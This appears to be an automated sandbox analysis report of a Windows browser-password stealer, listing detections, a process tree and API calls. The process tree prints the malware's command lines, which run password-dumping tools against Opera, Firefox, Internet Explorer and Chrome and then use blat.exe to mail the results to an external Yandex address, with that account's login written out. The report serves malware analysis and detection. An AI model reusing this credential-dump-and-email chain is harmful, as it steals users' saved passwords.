
Windows Analysis Report
0zu73p2YBu.exe

Overview

General Information

Sample name:0zu73p2YBu.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:01356f359af7ecda0db1b00ebcb7bc844ce1fb36bbdbf812bf4a749c22f0d620
Analysis ID:1559606
MD5:29eca65ffa92a3f877b59df42e2150ed
SHA1:df50e54f9a2b5b6b8831a1e967fba1292ef31790
SHA256:01356f359af7ecda0db1b00ebcb7bc844ce1fb36bbdbf812bf4a749c22f0d620
Infos:

Detection

Chrome Password Stealer, Fox Password Stealer, Opera Password Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Chrome Password Stealer
Yara detected Fox Password Stealer
Yara detected Opera Password Stealer
AI detected suspicious sample
Contains functionality to steal Internet Explorer form passwords
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Outbound SMTP Connections
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 0zu73p2YBu.exe (PID: 7292 cmdline: "C:\Users\user\Desktop\0zu73p2YBu.exe" MD5: 29ECA65FFA92A3F877B59DF42E2150ED)
    • .exe (PID: 7332 cmdline: "C:\Users\user\AppData\Local\Temp\ .exe" MD5: 6867A307FDB19A4B89696F07FBFB1847)
      • cmd.exe (PID: 7372 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\600.tmp\ip.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 7812 cmdline: ping -n 3 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
        • OperaPassView.exe (PID: 7972 cmdline: OperaPassView.exe /stext user-PC_OperaPassView.txt MD5: 8B4AE559AD7836B27EE9F8F171BE8139)
        • PING.EXE (PID: 7980 cmdline: ping -n 3 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
        • PasswordFox.exe (PID: 8052 cmdline: PasswordFox.exe /stext user-PC_PasswordFox.txt MD5: CC84065F23CFC3D980AAD38EFC648DE6)
        • PING.EXE (PID: 8060 cmdline: ping -n 3 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
        • iepv.exe (PID: 8096 cmdline: iepv.exe /stext user-PC_iepv.txt MD5: C861FE184E271D6E2BA958DA306BA748)
        • PING.EXE (PID: 8104 cmdline: ping -n 3 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
        • ChromePass.exe (PID: 8164 cmdline: ChromePass.exe /stext user-PC_ChromePass.txt MD5: CB271441FA19AC163ECF380C8EBB3109)
        • PING.EXE (PID: 8172 cmdline: ping -n 120 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
        • blat.exe (PID: 7972 cmdline: blat.exe -install -server smtp.yandex.ru -port 587 -f alexandrKondratiev5@yandex.ru -u alexandrKondratiev5 -pw qwerty5 MD5: 31F84E433E8D1865E322998A41E6D90E)
        • PING.EXE (PID: 6736 cmdline: ping -n 3 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
        • blat.exe (PID: 6432 cmdline: blat.exe -to alexandrKondratiev5@yandex.ru -subject "Opera" -attachi "user-PC_OperaPassView.txt" -body "Opera" MD5: 31F84E433E8D1865E322998A41E6D90E)
        • PING.EXE (PID: 7984 cmdline: ping -n 3 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
        • blat.exe (PID: 8112 cmdline: blat.exe -to alexandrKondratiev5@yandex.ru -subject "Fox" -attachi "user-PC_PasswordFox.txt" -body "Fox" MD5: 31F84E433E8D1865E322998A41E6D90E)
        • PING.EXE (PID: 8108 cmdline: ping -n 3 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
        • blat.exe (PID: 8164 cmdline: blat.exe -to alexandrKondratiev5@yandex.ru -subject "ie" -attachi "user-PC_iepv.txt" -body "ie" MD5: 31F84E433E8D1865E322998A41E6D90E)
        • PING.EXE (PID: 2260 cmdline: ping -n 3 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
        • blat.exe (PID: 2720 cmdline: blat.exe -to alexandrKondratiev5@yandex.ru -subject "Chrome" -attachi "user-PC_ChromePass.txt" -body "Chrome" MD5: 31F84E433E8D1865E322998A41E6D90E)
        • PING.EXE (PID: 2140 cmdline: ping -n 3 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp | JoeSecurity_FoxPasswordStealer | Yara detected Fox Password Stealer | Joe Security |
Process Memory Space: OperaPassView.exe PID: 7972 | JoeSecurity_OperaPasswordStealer | Yara detected Opera Password Stealer | Joe Security |
Process Memory Space: PasswordFox.exe PID: 8052 | JoeSecurity_FoxPasswordStealer | Yara detected Fox Password Stealer | Joe Security |
Process Memory Space: ChromePass.exe PID: 8164 | JoeSecurity_ChromePasswordStealer | Yara detected Chrome Password Stealer | Joe Security |

Source | Rule | Description | Author | Strings
11.2.PasswordFox.exe.400000.0.unpack | JoeSecurity_FoxPasswordStealer | Yara detected Fox Password Stealer | Joe Security |
9.2.OperaPassView.exe.400000.0.unpack | JoeSecurity_OperaPasswordStealer | Yara detected Opera Password Stealer | Joe Security |

Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\0zu73p2YBu.exe, ProcessId: 7292, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Source: Network Connection | Author: frack113 | Data: DestinationIp: 77.88.21.158, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe, Initiated: true, ProcessId: 6432, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49773
No Suricata rule has matched


              AV Detection

Source: 0zu73p2YBu.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe | Avira: detection malicious, Label: SPR/PassFox.R
Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Avira: detection malicious, Label: SPR/PSW.Gen
Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | ReversingLabs: Detection: 71%
Source: 0zu73p2YBu.exe | ReversingLabs: Detection: 100%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ .exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Joe Sandbox ML: detected
Source: 0zu73p2YBu.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Code function: 13_2_0040345F CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash
Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Code function: 13_2_00403C66 memcmp,memset,memset,memset,memset,MultiByteToWideChar,MultiByteToWideChar,memcmp,LocalAlloc,memcpy,CryptDecrypt,LocalFree,GetLastError
Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Code function: 13_2_004034C9 CryptCreateHash,CryptHashData,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash
Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Code function: 13_2_00403635 CryptHashData,CryptHashData,CryptHashData,CryptGetHashParam
Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Code function: 13_2_004036F8 memset,memset,memset,memcpy,memcpy,CryptCreateHash,CryptHashData,CryptHashData,CryptHashData,CryptDestroyHash
Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Code function: 13_2_0040369A CryptHashData,CryptDeriveKey,CryptDestroyHash
Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Code function: 13_2_0040337E CryptReleaseContext
Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Code function: 13_2_00403391 CryptAcquireContextA,GetLastError
Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_004028C0 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash
Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_0040315B memcmp,memset,memset,memset,memset,memcmp,LocalAlloc,memcpy,CryptDecrypt,LocalFree,GetLastError
Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_0040292A CryptCreateHash,CryptHashData,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash
Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_00402AFB CryptHashData,CryptDeriveKey,CryptDestroyHash
Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_00402A96 CryptHashData,CryptHashData,CryptHashData,CryptGetHashParam
Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_00402B59 memset,memset,memset,memcpy,memcpy,CryptCreateHash,CryptHashData,CryptHashData,CryptHashData,CryptDestroyHash
Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_00408E80 CryptReleaseContext,??3@YAXPAX@Z
Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_004027EF CryptAcquireContextW,GetLastError
Source: 0zu73p2YBu.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Binary string: z:\Projects\VS2005\OperaPassView\Release\OperaPassView.pdb | source: OperaPassView.exe, OperaPassView.exe, 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp
Source: Binary string: .pdb?P | source: .exe, 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, OperaPassView.exe, 00000009.00000000.1722119973.000000000040E000.00000080.00000001.01000000.0000000D.sdmp, OperaPassView.exe.1.dr
Source: Binary string: z:\Projects\VS2005\iepv\Release\iepv.pdb | source: iepv.exe, iepv.exe, 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: z:\Projects\VS2005\PasswordFox\Release\PasswordFox.pdb | source: PasswordFox.exe, PasswordFox.exe, 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp
Source: Binary string: z:\Projects\VS2005\ChromePass\Release\ChromePass.pdb | source: ChromePass.exe, ChromePass.exe, 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp
Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe | Code function: 11_2_0040518C FindFirstFileW,FindNextFileW,wcslen,wcslen
Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe | Code function: 11_2_00404D0E FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Code function: 13_2_004063F9 FindFirstFileA,FindNextFileA,strlen,strlen
Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_00405798 FindFirstFileW,FindNextFileW,wcslen,wcslen
Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 20_2_004058AD malloc,ReadFile,strcpy,strrchr,strrchr,strrchr,FindFirstFileA,strcpy,strcat,malloc,malloc,strlen,malloc,memcpy,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 20_2_0040B976 lstrcpyA,FindFirstFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 22_2_004058AD malloc,ReadFile,strcpy,strrchr,strrchr,strrchr,FindFirstFileA,strcpy,strcat,malloc,malloc,strlen,malloc,memcpy,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 22_2_0040B976 lstrcpyA,FindFirstFileA,FindClose

              Networking

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.0.0.1
Source: global traffic | TCP traffic: 192.168.2.4:49773 -> 77.88.21.158:587
Source: Joe Sandbox View | IP Address: 77.88.21.158
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: smtp.yandex.ru
Source: global traffic | DNS traffic detected: DNS query: yandex.ru
Source: OperaPassView.exe, 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp | String found in binary or memory: http://https://.savesignIn
Source: blat.exe.1.dr | String found in binary or memory: http://www.blat.net
Source: blat.exe, blat.exe, 00000016.00000000.2416776928.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000016.00000002.2480400181.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000002.2562327376.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000000.2501549509.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000002.2652796169.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000000.2583383482.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000000.2674034956.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000002.2734819820.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.dll.1.dr, blat.exe.1.dr | String found in binary or memory: http://www.blat.net)
Source: .exe, 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, blat.exe, 00000014.00000002.2395717223.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000014.00000000.2395093923.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000016.00000000.2416776928.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000016.00000002.2480400181.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000002.2562327376.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000000.2501549509.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000002.2652796169.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000000.2583383482.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000000.2674034956.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000002.2734819820.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.dll.1.dr, blat.exe.1.dr | String found in binary or memory: http://www.blat.net)User-Agent:
Source: .exe | String found in binary or memory: http://www.blat.net/
Source: .exe, 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, blat.dll.1.dr | String found in binary or memory: http://www.blat.net/V
Source: .exe, 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, blat.exe, 00000014.00000002.2395776689.0000000000426000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000016.00000002.2480455991.0000000000426000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000000.2501598450.0000000000426000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000000.2583455609.0000000000426000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000000.2674118562.0000000000426000.00000002.00000001.01000000.00000011.sdmp, blat.exe.1.dr | String found in binary or memory: http://www.blat.net/h
Source: .exe, 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, blat.exe, 00000014.00000002.2395717223.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000014.00000000.2395093923.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000016.00000000.2416776928.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000016.00000002.2480400181.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000002.2562327376.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 00000019.00000000.2501549509.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000002.2652796169.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001B.00000000.2583383482.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000000.2674034956.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.exe, 0000001D.00000002.2734819820.0000000000413000.00000002.00000001.01000000.00000011.sdmp, blat.dll.1.dr, blat.exe.1.dr | String found in binary or memory: http://www.blat.netX-Mailer:
Source: iepv.exe, 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, ChromePass.exe, ChromePass.exe, 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp | String found in binary or memory: http://www.nirsoft.net/
Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe | Code function: 9_2_00407FBA GetTempPathW,GetWindowsDirectoryW,GetTempFileNameW,OpenClipboard,GetLastError,DeleteFileW
Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe | Code function: 9_2_00403B17 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe | Code function: 11_2_004043CD EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Code function: 13_2_0040561D EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_004049F5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_00405D3C GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetFocus,GetFocus,GetClassNameA,strncmp,GetFocus,SendMessageA,GetPropA
Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_00405B1F GetPropA,DefFrameProcA,SetLastError,NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_00407E1A sprintf,GetPropA,HeapFree,HeapFree,HeapFree,RemovePropA,CallWindowProcA,NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_00404714 GetWindowLongA,CallWindowProcA,RemovePropA,RemovePropA,RemovePropA,RevokeDragDrop,SetWindowLongA,NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Code function: 13_2_00401715 NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Code function: 13_2_004017CF NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_00406960
Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_004598D3
Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_00477941
Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_00458AB9
Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_00476B26
Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_004573F1
Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_0047544D
Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_00406C10
Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_0046DCF9
Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_00457D75
Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_0044FD0D
Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_0046E5E9
Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_004505FD
Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_00458EAF
Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: 1_2_00476F1D
Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe | Code function: 9_2_004090DD
Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe | Code function: 9_2_0040A887
Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe | Code function: 9_2_00402EAC
Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe | Code function: 9_2_0040291B
Source: C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe | Code function: 9_2_00402DAF
Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Code function: 13_2_004044DE
Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Code function: 13_2_0040454F
Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Code function: 13_2_004045C0
Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Code function: 13_2_00404651
Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_0041281D
Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_0042014F
Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_004039F2
Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_00403A63
Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_00415232
Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_00403AD4
Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_00403B65
Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_0041ABA9
Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_0040C558
Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_004275A0
Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: 15_2_004256F0
Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 20_2_00408063
Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 20_2_00411CAB
Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 20_2_00408953
Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 20_2_0041020F
Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 20_2_00411287
Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 20_2_00410E90
Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 20_2_0040F7B7
Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 22_2_00408063
Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 22_2_00411CAB
Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 22_2_00408953
Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 22_2_0041020F
Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 22_2_00411287
Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 22_2_00410E90
Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: 22_2_0040F7B7
Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: String function: 0040C0CC appears 48 times
Source: C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe | Code function: String function: 0040B4A0 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: String function: 00412220 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: String function: 00401119 appears 117 times
Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: String function: 00401292 appears 270 times
Source: C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe | Code function: String function: 004121F8 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: String function: 00459E36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\ .exe | Code function: String function: 00477EB6 appears 31 times
Source: PasswordFox.exe.1.dr | Static PE information: Resource name: RT_DIALOG type: COM executable for DOS
Source: .exe.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9976262659914712
Source: ChromePass.exe.1.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9891438802083333
Source: PasswordFox.exe.1.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9922195184426229
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@46/28@2/2
Source: C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe | Code function: 13_2_0040BFA0 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Code function: 0_2_004014CB GetSystemDirectoryA,PathAddBackslashA,GetWindowsDirectoryA,PathAddBackslashA,GetTempPathA,PathAddBackslashA,GetModuleFileNameA,PathFindFileNameA,GetEnvironmentVariableA,PathAddBackslashA,SHGetSpecialFolderPathA,PathAddBackslashA,SHGetSpecialFolderPathA,PathAddBackslashA,FindResourceA,SizeofResource,LoadResource,LockResource,GlobalAlloc,RtlMoveMemory,GlobalAlloc,RtlMoveMemory,RtlDecompressBuffer,GlobalFree,lstrcpynA,lstrcpyA,lstrlenA,lstrcpyA,lstrlenA,lstrcpyA,PathAddBackslashA,lstrcatA,lstrcpyA,CreateFileA,WriteFile,HeapAlloc,WriteFile,HeapFree,CreateFileA,GetFileSize,CloseHandle,HeapAlloc,WriteFile,HeapFree,CloseHandle,GlobalFree,SetFileAttributesA,lstrcpyA,PathFindFileNameA,ShellExecuteA,FreeResource,ExitProcess,ExitProcess
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7380:120:WilError_03
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | File created: C:\Users\user\AppData\Local\Temp\ .exe
Source: C:\Users\user\AppData\Local\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\600.tmp\ip.bat" "
Source: 0zu73p2YBu.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\0zu73p2YBu.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ChromePass.exe, ChromePass.exe, 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
